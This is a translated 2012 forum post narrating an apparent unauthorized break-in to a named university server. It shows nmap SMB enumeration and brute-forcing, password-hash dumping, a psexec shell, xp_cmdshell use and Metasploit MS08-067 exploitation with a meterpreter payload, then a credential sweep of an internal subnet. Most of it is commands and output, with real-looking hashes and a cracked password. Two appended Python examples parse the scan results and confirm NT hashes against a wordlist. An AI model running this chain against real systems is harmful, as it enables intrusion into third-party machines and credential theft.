nmap + msf intrusion into Guangxi Normal University

Posted by the original poster on 2012-12-4 12:46:42
Guangxi Normal University site: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the password hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the MS08-067 vulnerability on the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.

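The post runs four SMB NSE scripts by hand and reads the results off the screen. The block below is an added example (my code, not code from the post or from nmap): a parser for the "Host script results" blocks of nmap normal output in the 5.59-era format shown above, which turns smb-enum-users, smb-enum-shares, smb-brute and smb-check-vulns results into a per-host findings list sorted by severity. The sample input is a constructed, abridged copy of the post's output for the first host plus a made-up second host; the function names (parse_nmap_smb, summarize) are this example's own.

```python
import re

# Constructed sample input: an abridged copy of the first host's scan output as
# shown in the post, plus a second, made-up host for contrast.
SAMPLE_OUTPUT = """\
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.1.50
Host is up (0.0010s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-enum-shares:
|   IPC$
|_    Anonymous access: <none>
| smb-check-vulns:
|_  MS08-067: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*$")   # script header, e.g. "| smb-brute:"
ITEM_RE = re.compile(r"^\|_?\s+(\S.*)$")           # any indented result line
CRED_RE = re.compile(r"^(\S+?):(.*?) => Login was successful$")
ANON_RE = re.compile(r"^Anonymous access:\s*(\S+)")
VULN_RE = re.compile(r"^([\w-]+):\s*(.+)$")


def _new_host():
    return {"ports": [], "users": [], "shares": {}, "creds": [], "vulns": {}}


def parse_nmap_smb(text):
    """Return {ip: findings-dict} for every host in nmap normal output."""
    hosts, cur, script, share = {}, None, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                                   # new host block starts
            cur = hosts.setdefault(m.group(1), _new_host())
            script = share = None
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:
            cur["ports"].append(int(m.group(1)))
            continue
        m = SCRIPT_RE.match(line)
        if m:                                   # "| smb-xxx:" header selects the parser below
            script, share = m.group(1), None
            continue
        m = ITEM_RE.match(line)
        if not m:
            continue
        item = m.group(1).strip()
        if script == "smb-enum-users":
            um = re.search(r"Users:\s*(.*)", item)
            if um:
                cur["users"].extend(u.strip() for u in um.group(1).split(",") if u.strip())
        elif script == "smb-enum-shares":        # share name line, then its access line
            am = ANON_RE.match(item)
            if am and share:
                cur["shares"][share] = am.group(1)
            elif not am:
                share = item
        elif script == "smb-brute":
            cm = CRED_RE.match(item)
            if cm:
                pw = "" if cm.group(2) == "<blank>" else cm.group(2)
                cur["creds"].append((cm.group(1), pw))
        elif script == "smb-check-vulns":
            vm = VULN_RE.match(item)
            if vm:
                cur["vulns"][vm.group(1)] = vm.group(2).strip()
    return hosts


def summarize(hosts):
    """Flatten parsed results into (ip, severity, message) findings, worst first."""
    findings = []
    for ip, h in hosts.items():
        for name, status in h["vulns"].items():
            if status == "VULNERABLE":
                findings.append((ip, "critical", f"{name} reported {status}"))
        for user, pw in h["creds"]:
            if pw == "":
                findings.append((ip, "critical", f"account '{user}' has a blank password"))
            else:
                findings.append((ip, "high", f"guessable password for '{user}': {pw}"))
        for share, access in h["shares"].items():
            if access != "<none>":
                findings.append((ip, "medium", f"share {share} allows anonymous {access}"))
        if h["users"]:
            findings.append((ip, "low", f"{len(h['users'])} accounts enumerated anonymously: "
                                        + ", ".join(h["users"])))
    order = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    findings.sort(key=lambda f: (order[f[1]], f[0]))
    return findings


if __name__ == "__main__":
    for ip, sev, msg in summarize(parse_nmap_smb(SAMPLE_OUTPUT)):
        print(f"{sev:8} {ip:16} {msg}")
```

The second host in the sample shows the contrast that matters in a sweep like the one at the end of the post: an IPC$ share with no anonymous access and a NOT VULNERABLE verdict produce no finding at all, so only hosts worth acting on appear in the list.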
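The smb-pwdump output in the post gives away more than the author uses. This added example (my code, not from the post or from pwdump) reads a pwdump-style dump and checks each account offline. Two facts drive it: the NT hash is MD4 over the UTF-16LE password, so a guess is confirmed by recomputing it (MD4 per RFC 1320 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3); and the LM hash is built from two DES encryptions of "KGS!@#$%" keyed by the 7-byte halves of the uppercased password, so a second half of AAD3B435B51404EE (the null-key half) means the password is at most 7 characters, and pwdump's "NO PASSWORD***" marker stands for the all-null hash of an empty password. The sample dump is a constructed copy of the post's output; the names nt_hash, parse_pwdump and analyze_dump are this example's own.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM_HALF = "AAD3B435B51404EE"               # DES("KGS!@#$%") under an all-null 7-byte key
EMPTY_LM = EMPTY_LM_HALF * 2                     # LM hash of the empty password
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"    # MD4(b"") = NT hash of the empty password

# Constructed sample: the dump shown in the post, pwdump's "NO PASSWORD" marker intact.
SAMPLE_DUMP = """\
Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

_R2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]   # round-2 word order
_R3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]   # round-3 word order


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (pure Python; hashlib.new('md4') may be missing)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)      # bit length, little-endian
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                       # round 1: F(b,c,d) = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + f + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                       # round 2: G = majority(b, c, d)
            g = (b & c) | (b & d) | (c & d)
            a, b, c, d = d, _rotl((a + g + x[_R2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                       # round 3: H = b ^ c ^ d
            h = b ^ c ^ d
            a, b, c, d = d, _rotl((a + h + x[_R3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), upper-case hex as pwdump prints it."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text):
    """Yield (user, rid, lm, nt) from 'user:rid => LM:NT' lines; expand the NO PASSWORD marker."""
    rows = []
    for line in text.splitlines():
        if " => " not in line:
            continue
        ident, hashes = line.strip().split(" => ", 1)
        user, rid = ident.rsplit(":", 1)
        lm, nt = hashes.split(":", 1)
        lm = EMPTY_LM if lm.startswith("NO PASSWORD") else lm.upper()
        nt = EMPTY_NT if nt.startswith("NO PASSWORD") else nt.upper()
        rows.append((user, int(rid), lm, nt))
    return rows


def analyze_dump(text, wordlist):
    """Flag empty passwords, LM exposure, short passwords and wordlist hits per account."""
    guesses = {nt_hash(w): w for w in wordlist}   # NT hash -> candidate password
    report = {}
    for user, rid, lm, nt in parse_pwdump(text):
        flags = []
        if rid == 500:
            flags.append("built-in Administrator (RID 500)")
        if nt == EMPTY_NT:
            flags.append("empty password")
        else:
            if lm != EMPTY_LM:                    # LM stored at all: case-folded, two 7-char DES halves
                flags.append("LM hash stored (case-insensitive, crackable offline)")
                if lm.endswith(EMPTY_LM_HALF):    # second half is the null-key half
                    flags.append("password is 7 characters or fewer")
            if nt in guesses:
                flags.append(f"password cracked: {guesses[nt]}")
        report[user] = {"rid": rid, "flags": flags}
    return report


if __name__ == "__main__":
    for user, info in analyze_dump(SAMPLE_DUMP, ["password", "123456", "admin"]).items():
        print(f"{user:16} rid={info['rid']:<5} {'; '.join(info['flags']) or 'no finding'}")
```

Run against the post's dump, the test account is confirmed as 123456 straight from its NT hash, and its LM second half alone would have told a cracker to stop at 7 characters; TsInternetUser's LM hash shows neither property, so only the "LM stored" flag remains for it.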